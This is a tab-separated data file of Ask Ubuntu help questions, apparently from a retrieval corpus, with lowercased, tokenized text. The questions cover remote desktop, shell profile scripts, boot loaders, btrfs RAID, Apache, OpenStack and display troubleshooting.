438146	i ca n't access my windows machine with xfreerdp	my desktop machine is running windows 7 , and my laptop is running ubuntu 13.10 ( saucy ) . i installed xfreerdp on the laptop , and on the desktop i allowed remote access . i setup port forwarding on my router with port 3389 and the desktop as the host . i checked the port , and it is open . however when i try to access the machine with this command from the ubuntu terminal , i get an error : $ xfreerdp -u myusername -p mypassword 192.168.1.18 error : protocol security negotiation failure . ( 192.168.1.18 is my desktop 's ip address ) i 'm pretty new to all of this , so do n't assume any prior knowledge . i 've managed to get from the windows machine to the linux machine using ssh via putty , but i ca n't go the other way . the impetus for this is i am doing a major home addition , and i will be living at a friends house for a month . however i run a cad program on the desktop , and i need to be able to design while i 'm living in exile . thanks in advance for your help p.s . nevermind , i guess you ca n't get into a machine running windows 7 home , only windows 7 pro , business , or enterprise . maybe teamviewer ?
438150	scripts in /etc/profile.d being ignored ?	i 'm new to ubuntu . i 'm running 13.10 desktop . i wanted to set some system wide aliases and a custom prompt for bash . i found this article : https : //help.ubuntu.com/community/environmentvariables following the advice in this article , i created /etc/profiles.d/profile_local.sh . it is owned by root and has permissions of 644 just like the other scripts there : root @ ubuntu : /etc/profile.d # ll total 28 drwxr-xr-x 2 root root 4096 mar 23 08:56 . drwxr-xr-x 135 root root 12288 mar 23 09:15 .. -rw-r -- r -- 1 root root 660 oct 23 2012 bash_completion.sh -rw-r -- r -- 1 root root 3317 mar 23 07:36 profile_local.sh -rw-r -- r -- 1 root root 1947 nov 23 00:57 vte.sh i have further confirmed that /etc/profile calls /etc/profile.d . it contains this code block : if [ -d /etc/profile.d ] ; then for i in /etc/profile.d/*.sh ; do if [ -r $ i ] ; then . $ i fi done unset i fi upon login , it does not appear that the custom script , profile_local.sh i created gets sourced . however if after login i 'source /etc.profile.d/profile_local.sh ' , i get the expected behavior , my custom aliases , and custom prompt . what am i doing wrong ? contents of script 'profile_local.sh ' : # 3/23/14 - copied from gentoo /etc/bash/bashrc # placed in /etc/profile.d as described at : # https : //help.ubuntu.com/community/environmentvariables # this file is sourced by all *interactive* bash shells on startup , # including some apparently interactive shells such as scp and rcp # that ca n't tolerate any output . so make sure this does n't display # anything or bad things will happen ! # test for an interactive shell . there is no need to set anything # past this point for scp and rcp , and it 's important to refrain from # outputting anything in those cases . if [ [ $ - ! = *i* ] ] ; then # shell is non-interactive . be done now ! return fi # bash wo n't get sigwinch if another process is in the foreground . # enable checkwinsize so that bash will check the terminal size when # it regains control . # 65623 # http : //cnswww.cns.cwru.edu/~chet/bash/faq ( e11 ) shopt -s checkwinsize # enable history appending instead of overwriting . # 139609 shopt -s histappend # change the window title of x terminals case $ { term } in xterm*|rxvt*|eterm|aterm|kterm|gnome*|interix ) prompt_command='echo -ne `` \033 ] 0 ; $ { user } @ $ { hostname % % . * } : $ { pwd/ # $ home/~ } \007 '' ' ; ; screen ) prompt_command='echo -ne `` \033_ $ { user } @ $ { hostname % % . * } : $ { pwd/ # $ home/~ } \033\\ '' ' ; ; esac use_color=false # set colorful ps1 only on colorful terminals . # dircolors -- print-database uses its own built-in database # instead of using /etc/dir_colors . try to use the external file # first to take advantage of user additions . use internal bash # globbing instead of external grep binary . safe_term= $ { term// [ ^ [ : alnum : ] ] / ? } # sanitize term match_lhs= '' '' [ [ -f ~/.dir_colors ] ] & & match_lhs= '' $ { match_lhs } $ ( < ~/.dir_colors ) '' [ [ -f /etc/dir_colors ] ] & & match_lhs= '' $ { match_lhs } $ ( < /etc/dir_colors ) '' [ [ -z $ { match_lhs } ] ] \ & & type -p dircolors > /dev/null \ & & match_lhs= $ ( dircolors -- print-database ) [ [ $ '\n ' $ { match_lhs } == * $ '\n ' '' term `` $ { safe_term } * ] ] & & use_color=true if $ { use_color } ; then # enable colors for ls , etc . prefer ~/.dir_colors # 64489 if type -p dircolors > /dev/null ; then if [ [ -f ~/.dir_colors ] ] ; then eval $ ( dircolors -b ~/.dir_colors ) elif [ [ -f /etc/dir_colors ] ] ; then eval $ ( dircolors -b /etc/dir_colors ) fi fi if [ [ $ { euid } == 0 ] ] ; then ps1='\ [ \033 [ 01 ; 31m\ ] \h\ [ \033 [ 01 ; 34m\ ] \w \ $ \ [ \033 [ 00m\ ] ' else ps1='\ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 01 ; 34m\ ] \w \ $ \ [ \033 [ 00m\ ] ' fi alias ls='ls -- color=auto' alias grep='grep -- colour=auto' else if [ [ $ { euid } == 0 ] ] ; then # show root @ when we do n't have colors ps1='\u @ \h \w \ $ ' else ps1='\u @ \h \w \ $ ' fi fi # try to keep environment pollution down , epa loves us . unset use_color safe_term match_lhs tz= '' pst8pdt '' alias ll='ls -la' alias dig='dig +search' alias dir='ls -ba' alias edit= '' ee '' alias ss= '' ps -aux '' alias dot='ls . [ a-za-z0-9_ ] *' alias news= '' xterm -g 80x45 -e trn -e -s1 -n & '' alias more= '' less '' alias c= '' clear '' alias m= '' more '' alias j= '' jobs '' # common misspellings alias mroe=more alias pdw=pwd
438151	sound configuration gets lost after reboot	when you click the sound icon at the top right corner in ubuntu 12.04 it shows some options , i clicked the last one , `` sound settings '' , then on the new window i increase the `` output volume '' , more than a 100 % , later after restart my pc , this configuration is lost.. any solution ? ?
438156	how to install ubuntu on a pc without an os	i 'm trying to install ubuntu on my dad 's old gateway pc . what does each distro say on their website as to minimum specifications ?
438157	removing grub2 and reverting back to windows 8 boot loader	i 'm new to stack exchange and ubuntu . this question might be repeated but none of the solutions worked for me . i have ubuntu installed on my external hdd . i could boot it fine without any issues . after a few days due to some reason i could n't boot ubuntu since it was n't showing up when i selected boot from external device so i used boot repair which installed grub . i have windows 8 preinstalled on my laptop . now the problem is i have to connect my external hdd every time i want to load windows8 . i want to remove grub now and switch to default windows boot without deleting ubuntu . i 've tried bootsect /nt60 sys bootsect /nt60 all both have n't done the job for me . any help would be much appreciated . thanks in advance
438158	eclipse workspace and ubuntu one	i have 2 pc synchronized with ubuntu one . i would like to synchronize an eclipse workspace . will i encounter problem ? will be eclipse on another pc able to detect the projects that have been created on the other ?
438159	screencloud update - dependency is not satisfiable	screencloud offered an update yesterday , and as it did n't show up in the update manager ( i have it set up to fetch both important and other updates ) , i decided to check the ubuntu software center . the version there is the same one that was released last summer or so ( 1.1.0 ) , so i went on and downloaded the latest version from their website . trying to install that one i got an error saying that the dependency `` libquazip0 '' is not satisfiable . i 'm using ubuntu 12.04 x64 . i downloaded libquazip 0.6.2 ( the latest version ) but i do n't know how to install it . i worked with tar.gz archives before , but i usually followed the developers ' instructiond on where and how to install them . any help is appreciated . thanks in advance !
438165	ca n't login after reset of password in recover mode	ubuntu 12.04 lts : i lost my password but found a way to reset it in this forum . after restart i was not able to login and got a short black screen with some text . i recorded a video of the black screen and saw the following 2 error messages : mountall : plymouth command failed mountall : disconnected from plymouth how to do and fix ? best regards , soren sundstrup
438168	can i use option like ''format painter '' in libre office calc ?	i used to use 'format painter ' in office programs of windows , but now i decided to use libre office calc on ubuntu distribution and i do n't see any similar buttons for that operation ... the main problem is that i need to repeatedly do the same action to format cells in spreadsheets , it would be much easier to do it with format painter or something similar . is that possible in libre office calc ?
438169	router compatibility with ubuntu 12.04	i have ubuntu 12.04 . previously i was using another router for internet access , and it was working fine . now i have changed my router to d-link dsl 2750u : it connected once , and fter that i shut down my laptop . when i again tried to access the net through the wireless connection , the network name was not there in the list . it was in the hidden network list . i tried to connect from there but failed . please tell me is there some compatibility issue of ubuntu with d-link router ?
438172	ubuntu 13.10 wo n't load after amd-64microcode update	i just updated my amd microcode through synaptic , and rebooted . when it rebooted it loaded into the tty command prompt . so i tried rebooting it again . same thing . please help me get it to load .
438176	dpkg : error : parsing file '/var/lib/dpkg/status ' near line 29579 package 'gnome-terminal-data':	preconfiguring packages ... dpkg : error : parsing file '/var/lib/dpkg/status ' near line 29579 package 'gnome-terminal-data ' : eof during value of field `description ' ( missing final newline ) error in function :
438179	how can i toggle the touchpad depending on whether a mouse is connected ?	i want to have my touchpad disabled automatically when an external mouse is connected and enabled when there is none . i have tried using touchpad-indicator but that fails in cases when the computer has been put to sleep with a mouse connected and wkaned with the mouse disconnected . i have tried to make the following script into a daemon to solve this issue but i ca n't get it to work : # ! /bin/bash declare -i tid declare -i mid tid=`xinput list | grep -eo 'touchpad\s*id\= [ 0-9 ] { 1,2 } ' | grep -eo ' [ 0-9 ] { 1,2 } '` mid=`xinput list | grep -eo 'mouse\s*id\= [ 0-9 ] { 1,2 } ' | grep -eo ' [ 0-9 ] { 1,2 } '` if [ $ mid -gt 0 ] then xinput disable $ tid else xinput enable $ tid fi i tried start-stop-daemon -s -x ./myscript.sh -b and setsid ./myscript.sh > /dev/null 2 > & 1 < /dev/null & and nohup ./myscript 0 < & - & > /dev/null & and even ./myscript.sh & all of these return some 4-digit number , which , i guess , should be pid of the started process but when i launch lxtask there are no processes with this pid , even if i tick `` view all processes '' . and , of course , it does n't work !
438188	problems burning ubuntu onto usb - os x	i 've followed this guide by ubuntu.com on how to create a bootable usb of ubuntu . ive even followed this video on youtube . i have follwed it to the letter and all i get from the usb afterwards is the error message : '' the disk you inserted was not readable by this computer . '' and i 'm not able to boot from it . is there anything i 'm doing wrong ? thanks harry
438190	link on desktop with command terminal	i 'm trying to create two files with command on desktop and easy to run duble click : $ xinput set-int-prop 3 `` device enabled '' 8 0 $ xinput set-int-prop 2 `` device enabled '' 8 0 and next file : $ xinput set-int-prop 3 `` device enabled '' 8 1 $ xinput set-int-prop 2 `` device enabled '' 8 1 please help me . thanke you
438193	how to specify keyboard layout vairant in org.gnome.desktop.input-sources	i have a thinkpad laptop with an external apple keyboard . i like to remap the keys for the external keyboard so i have adjusted the relevant parts ( the section for mac ) in xkb/symbols/us and xkb/symbols/de as i type both in german and english . ultimately i would like to be able to have an english and a german keyboard with remapped keys available when the apple keyboard is plugged in and a basic english and german keyboard available when the external keyboard is not attached . i wanted to use gsettings set org.gnome.desktop.input-sources to switch the available keyboards . this works fine for basic keyboards , e.g . gsettings set org.gnome.desktop.input-sources sources `` [ ( 'xkb ' , 'us ' ) , ( 'xkb ' ) , 'de ' ) ] '' provides the choice between the basic english and german keyboard . the problem however is this . running gsettings set org.gnome.desktop.input-sources sources `` [ ( 'xkb ' , 'de ( mac ) ' ) ] '' does not seem to work . so the variant de ( mac ) for some reason can not be added like this . switching with setxkmap , however , works setxkbmap -layout `` de ( mac ) '' . say i started with the us ( mac ) keyboard setxkbmap -layout `` us ( mac ) '' setxkbmap -print xkb_keymap { xkb_keycodes { include `` evdev+aliases ( qwerty ) '' } ; xkb_types { include `` complete '' } ; xkb_compat { include `` complete '' } ; xkb_symbols { include `` pc+us ( mac ) +inet ( evdev ) +terminate ( ctrl_alt_bksp ) '' } ; xkb_geometry { include `` pc ( pc105 ) '' } ; } ; then i try to switch but the keyboard remains on us ( mac ) . gsettings set org.gnome.desktop.input-sources sources `` [ ( 'xkb ' , 'de ( mac ) ' ) ] '' ` setxkbmap -print xkb_keymap { xkb_keycodes { include `` evdev+aliases ( qwerty ) '' } ; xkb_types { include `` complete '' } ; xkb_compat { include `` complete '' } ; xkb_symbols { include `` pc+us ( mac ) +inet ( evdev ) +terminate ( ctrl_alt_bksp ) '' } ; xkb_geometry { include `` pc ( pc105 ) '' } ; } ; anybody know how to reference a variant in org.gnome.desktop.input-sources ? thanks a lot !
438195	how to make 13.10 see a monitor when there is none ?	i have ubuntu 13.10 installed on a dell poweredge 1850 server that i start up in the afternoon and shut down at night . when it ca n't see a monitor , it defaults to 1024x768 . when i hook up a monitor by vga , i can use a command to force it to the full 1680x1050 that the monitor can handle ( even though the monitor is hooked up by vga and so ubuntu ca n't detect it specifically ) , but when i vnc into it , it does not see a monitor , and so is locked into 1024x768 , which i ca n't even change with the command because it does not see a monitor at all . similarly , if i boot it up without a monitor and later connect one , it does not output any picture at all . if it is possible , and will let me force a 1680x1050 resolution , then is there a way to make ubunutu see a monitor even if there is n't one ? a startup setting , perhaps ? also , does a solution to this exist in ubuntu server , which i probably should have installed instead in retrospect ? if so , what is it ?
438197	accessing other hdds ubuntu server cli	this is quite possibly the most basic question ever asked on this forum , but i ca n't find an answer anywhere . i have installed ubuntu server on a hdd and installed two additional hdds for file storage . the installation went fine and adding the other two hdds went flawlessly . disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e69a4 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 488396799 243947521 5 extended /dev/sda5 501760 488396799 243947520 8e linux lvm disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xe2b08df4 device boot start end blocks id system /dev/sdb1 2048 3907029167 1953513560 83 linux disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x147347c4 device boot start end blocks id system /dev/sdc1 2048 3907029167 1953513560 83 linux disk /dev/mapper/movieland -- vg-root : 245.6 gb , 245631025152 bytes 255 heads , 63 sectors/track , 29862 cylinders , total 479748096 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/movieland -- vg-root does n't contain a valid partition table disk /dev/mapper/movieland -- vg-swap_1 : 4169 mb , 4169138176 bytes 255 heads , 63 sectors/track , 506 cylinders , total 8142848 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/movieland -- vg-swap_1 does n't contain a valid partition table the two 2tb drives have been mounted to /media/primarydrive and /media/backupdrive . /dev/mapper/movieland -- vg-root on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sdb1 on /media/primarydrive type ext4 ( rw ) /dev/sdc1 on /media/backupdrive type ext4 ( rw ) /dev/sda1 on /boot type ext2 ( rw ) now for the question , how do i actually access these drives to put files on them ? i would like to put movies into /media/primarydrive/movies , but when i create the directory and then try to access it , i am told no such file or directory . what do i need to do to use these drives ? sorry for the wall of text , but in my research these are the answers to the two most common responses on these forums . thank you in advance .
438199	btrfs - did i just turn raid1 into raid10 ?	i set up a btrfs partition using two 3 tb drives in raid 1 : $ mkfs.btrfs -m raid1 -d raid1 /dev/sdd /dev/sde $ mount /dev/sdd /media/media copied a bunch of data onto the partition , with the result : $ du -hs /media/media 2.5t /media/media $ btrfs filesystem show label : none uuid : 9c2dd511-33bf-454e-9169-594cd84bee05 total devices 2 fs bytes used 2.41tb devid 2 size 2.73tb used 2.41tb path /dev/sde devid 1 size 2.73tb used 2.41tb path /dev/sdd # # i 'm spoofing this a bit as i do n't have a log of the response at this point next , i added another 3 tb drive and a 4 tb drive : $ btrfs device add /dev/sdb /dev/sdc /media/media $ btrfs filesystem balance done , had to relocate 2538 out of 2538 chunks $ btrfs filesystem show label : none uuid : 9c2dd511-33bf-454e-9169-594cd84bee05 total devices 4 fs bytes used 2.41tb devid 2 size 2.73tb used 945.03gb path /dev/sde devid 1 size 2.73tb used 944.04gb path /dev/sdd devid 4 size 2.73tb used 1.24tb path /dev/sdc devid 3 size 3.64tb used 1.84tb path /dev/sdb # # actual output this time $ root @ leviathan : /media # df -h filesystem size used avail use % mounted on /dev/sda1 95g 82g 8.7g 91 % / # # snip /dev/sdd 12t 4.9t 6.8t 42 % /media/media now , the output from btrfs fi sh sums to 4.92 tb , double the amount of disk space reported by du -hs , not 4x as i 'd expect from a raid 1 array using four disks . i had planned to convert the raid1 to raid10 using btrfs balance start -dconvert=raid10 -mconvert=raid10 /media/media , but the output seems to indicate that it 's already behaving as raid 10 . am i off base here ? do i not need to convert ? or have i screwed something else up ? additional information , if it matters : # btrfs version btrfs v0.20-rc1 # uname -a linux leviathan 3.11.0-18-generic # 32-ubuntu smp tue feb 18 21:11:14 utc 2014 x86_64 x86_64 x86_64 gnu/linux # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy
438200	no user folders ubuntu 12.04	as a learning excerise , i have installed ubuntu ( from scratch ) using the alternate install cd and then building on top of that . installing an xserver , a display manager , a window manager etc . i 've learned a lot . i now have ubuntu 12.04 , an xserver and the gnome-core desktop ( which includes gdm and a whole host of other core stuff ) . i 've installed a theme and so on and so forth , and it 's looking pretty good . rather pleased with myself lol but ... . i have no home folders . i have the directory /home/myname but i do n't have /home/myname/documents , /home/myname/pictures etc . you know the ones , with the emblems on them . what have i missed out ?
438203	merge unallocated space to extended partition and create new logical drive	i am new to ubuntu . i just formatted , and installed ubuntu alongside windows . while partitioning , i made a mistake it seems . 20 gb goes unallocated and i am unable to use it . i used gparted to try to recover that space . i already tried many existing solutions , but it is not working for me . i hope my question is clear . thanks in advance .
438205	undefined reference to `dlopen ' despite cmake_dl_libs	i 'm trying to install the tools for gameplay3d . after following the cmake installation instructions , i get this error : linking cxx executable gameplay-encoder /usr/lib/gcc4/x64/release/libfbxsdk.so : undefined reference to `dlopen' /usr/lib/gcc4/x64/release/libfbxsdk.so : undefined reference to `dlclose' /usr/lib/gcc4/x64/release/libfbxsdk.so : undefined reference to `dlsym' the cmakelists.txt file comes with these definitions ( notice -ldl and $ { cmake_dl_libs } , which seemed to solve the problem for others in related threads ) : add_definitions ( -lstdc++ -ldl -lfbxsdk -lpng -lz -lfreetype -lpthread ) ... target_link_libraries ( $ { app_name } $ { app_libraries } $ { cmake_dl_libs } ) thanks for the help !
438206	automatically start bash script when opening a graphical program	i want to start a shell script automatically when i 'm starting , e.g. , libreoffice . the problem is that i do n't know how . where would i build the trigger to start the script in . is there a folder/file where i can build the trigger in ? it would be great if i would n't have to build a complete 'new ' version of libreoffice to run a few lines of shell-script .
438209	`` unable to open logs '' error when i try to restart apache	when i try to start apache i get the following error root @ server11362 : ~ # sudo /etc/init.d/apache2 restart restarting web server apache2 ( 98 ) address already in use : make_sock : could not bind to address 111.90.150.93:80 no listening sockets available , shutting down unable to open logs action 'start ' failed . the apache error log may have more information . in fact the apache log contains no more information . netstat -tulpn returns the following active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1098/mysqld tcp 0 0 127.0.0.1:6379 0.0.0.0 : * listen 1414/redis-server tcp 0 0 111.90.150.93:53 0.0.0.0 : * listen 1068/named tcp 0 0 111.90.150.92:53 0.0.0.0 : * listen 1068/named tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 1068/named tcp 0 0 127.0.0.1:5432 0.0.0.0 : * listen 1194/postgres tcp 0 0 0.0.0.0:44888 0.0.0.0 : * listen 845/sshd tcp 0 0 0.0.0.0:25 0.0.0.0 : * listen 1395/master tcp 0 0 127.0.0.1:953 0.0.0.0 : * listen 1068/named tcp 0 0 0.0.0.0:6081 0.0.0.0 : * listen 1435/varnishd tcp 0 0 127.0.0.1:6082 0.0.0.0 : * listen 1434/varnishd tcp6 0 0 : ::53 : : : * listen 1068/named tcp6 0 0 : ::44888 : : : * listen 845/sshd tcp6 0 0 : ::25 : : : * listen 1395/master tcp6 0 0 : :1:953 : : : * listen 1068/named tcp6 0 0 : ::6081 : : : * listen 1435/varnishd udp 0 0 111.90.150.93:53 0.0.0.0 : * 1068/named udp 0 0 111.90.150.92:53 0.0.0.0 : * 1068/named udp 0 0 127.0.0.1:53 0.0.0.0 : * 1068/named udp6 0 0 : ::53 there is nothing on port 80 but i still can not restart
438210	how can i use vso downloader	i downloaded vso downloader and tried to install it , but i do n't know how to do that . i also tried to use wine to run it , without succes . i do n't know if it is possible at all to install it . is there a way i can use vso downloader on ubuntu ?
438211	how to find the internet data usage of all users and categorized per user in ubuntu ?	want to get the data usage of all users in ubuntu like : username1 = datausage username2 = datausage username3 = datausage etc
438212	is it possible to downgrade the default version of python from my ubuntu installation ?	i have installed ubuntu 14.04 which comes with python 3.4 installed by default . but i wish to downgrade it to python 3.3 for my needs . however , when i try to remove it , it also wants to remove other packages along with it which seem to be using python . is it possible to safely downgrade the default version of python ? what other options do i have in this regard ?
438215	no add folder toolbar item or edit menu visible in file roller with unity 13.10	i need to add selected files from sub folders in file roller and retain the relative paths . the help docs refer to an add folder toolbar item and a add folder option on the the edit menu that should allow me to do something like this . neither the the toolbar option or or any edit menu are visible in file roller running on the unity desktop in 13.10 . is this a bug or am i missing something ? roger
438219	automatically remove `` package-dbg '' if `` package '' is removed	i usually install many debug packages to know what happened when something crashed . but those debug packages are not removed when i remove the package they belong to , for example if i type sudo apt-get autoremove gimp gimp-dbg will not be removed . could i somehow mark a dbg package to be removed if the respective package is removed , meaning could i mark gimp-dbg to be removed if i remove gimp ?
438223	need permissions to install extensions inside the usr/share/inkscape folder . how can i do that ?	i am trying to install an inkscape extension and i should copy some files to /usr/share/inkscape/extensions it seems i do n't have permission to do so , although i am the sole user of the pc ( and administrator according to to the user settings ) . could anyone tell me how i can do that ? thanks in advance . ps : i would prefer not to use the terminal
438224	dispatch two internet connections in ubuntu	i have two internet connections and i want to use them simultaneously in ubuntu server to increase bandwidth and use this ubuntu server as gateway for my lan .
438228	i want to play miniclip multiplayer 8ball pool but ca n't !	i can play other table games like nine ball or quick fire but i can not play against another player and the screen does n't load . i have looked for several sites , downloaded what i read , changed browser to chromium and tried to correct this problem for several hours and just wonder `` am i stupid '' ? ? could use some support an hoping i get it : )
438233	how to set ctrl+alt+del as the keyboard shortcut to open lxtask or htop	i was wondering what command i need to put in the command field in the `` custom shortcut '' window to open lxtask or htop with ctrl+alt+del .
438238	openstack nova-compute : libvirterror : internal error : cpu feature `rtm ' specified more than once	please help ... trying to install openstack but nova-compute fails every time . i 've tried downgrading libvirt to 1.1.1 per a similar post with no luck . i am running on d34010wyk with intel i3 and 4 gigs ram and 120gig ssd ( for testing and devel ) . here is my /var/log/nova/nova-compute.log 2014-03-23 12:19:57.447 6970 info nova.openstack.common.periodic_task [ - ] skipping periodic task _periodic_update_dns because its interval is negative 2014-03-23 12:19:57.481 6970 info nova.virt.driver [ - ] loading compute driver 'libvirt.libvirtdriver' 2014-03-23 12:19:57.506 6970 info oslo.messaging._drivers.impl_rabbit [ - ] connected to amqp server on controller:5672 2014-03-23 12:19:57.518 6970 info oslo.messaging._drivers.impl_rabbit [ - ] connected to amqp server on controller:5672 2014-03-23 12:19:57.540 6970 audit nova.service [ - ] starting compute node ( version 2014.1-b3 ) 2014-03-23 12:19:57.565 6970 warning nova.virt.libvirt.driver [ req-c4355ac3-8ab3-4c83-b7ae-ead3b3eb8316 none none ] can not update service status on host : nuc , since it is not registered . 2014-03-23 12:19:57.566 6970 warning nova.virt.libvirt.driver [ - ] uri qemu : ///system does not support events : internal error : could not initialize domain event timer 2014-03-23 12:19:57.581 6970 error nova.openstack.common.threadgroup [ - ] internal error : cpu feature `rtm ' specified more than once 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup traceback ( most recent call last ) : 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/openstack/common/threadgroup.py '' , line 117 , in wait 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup x.wait ( ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/openstack/common/threadgroup.py '' , line 49 , in wait 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup return self.thread.wait ( ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/greenthread.py '' , line 168 , in wait 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup return self._exit_event.wait ( ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/event.py '' , line 116 , in wait 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup return hubs.get_hub ( ) .switch ( ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/hubs/hub.py '' , line 187 , in switch 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup return self.greenlet.switch ( ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/greenthread.py '' , line 194 , in main 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup result = function ( *args , **kwargs ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/openstack/common/service.py '' , line 480 , in run_service 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup service.start ( ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/service.py '' , line 180 , in start 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup self.manager.init_host ( ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 810 , in init_host 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup self.driver.init_host ( host=self.host ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py '' , line 630 , in init_host 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup self._do_quality_warnings ( ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py '' , line 618 , in _do_quality_warnings 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup caps = self.get_host_capabilities ( ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py '' , line 2813 , in get_host_capabilities 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup libvirt.vir_connect_baseline_cpu_expand_features ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/tpool.py '' , line 179 , in doit 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup result = proxy_call ( self._autowrap , f , *args , **kwargs ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/tpool.py '' , line 139 , in proxy_call 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup rv = execute ( f , *args , **kwargs ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/eventlet/tpool.py '' , line 77 , in tworker 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup rv = meth ( *args , **kwargs ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 3127 , in baselinecpu 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup if ret is none : raise libvirterror ( 'virconnectbaselinecpu ( ) failed ' , conn=self ) 2014-03-23 12:19:57.581 6970 trace nova.openstack.common.threadgroup libvirterror : internal error : cpu feature `rtm ' specified more than once
438241	unable to connect to virtual machine	i have followed the tutorial from here to install openstack in ubuntu which is a guest os on windows 8 using virtual box but when i try to open openstack dashboard in browser from url http : ///horizon google chrome shows oops ! google chrome could not connect to 10.0.2.15 i can see virtual-box host-only network in my network and sharing center but it shows no network access
438242	wacky chromebook hdmi : outputs at native screen resolution + no audio	i 'm running ubuntu 12.04 + unity on an acer chromebook c720 with crouton . it 's usually connected to an external keyboard , mouse , and hdmi display , but also sometimes used as a standalone laptop . the hdmi output works properly in chrome os , but not in ubuntu . at first i used to get video output at the 1388x764 resolution of the internal screen , scaled up to match the height of the display , with the rightmost part of the image off the external screen . more recently , with seemingly no change , it has switched to painting 1388x764 in the upper left corner of the screen , with an l-shape of black bars on the right and bottom . ubuntu does not detect an external display , ie there 's nothing for me to configure in system settings > displays . the device has integrated intel hd graphics , so i 've reinstalled xserver-xorg-video-intel , which did n't fix the problem , and i 've also tried intel 's linux driver software , which wo n't actually install because of a libglib dependency which ca n't be resolved . what else can i try ? ideally i 'd like it to switch resolutions automatically when the hdmi display is disconnected . there 's also no audio output over hdmi . i 've checked the alsa mixer and it 's not muted , which is apparently a common mistake . i suspect that fixing the video output might also fix this as well . everything works properly in chrome os so i 'm sure it 's not the hardware , but it 's a dell u2711 display , in case that matters .
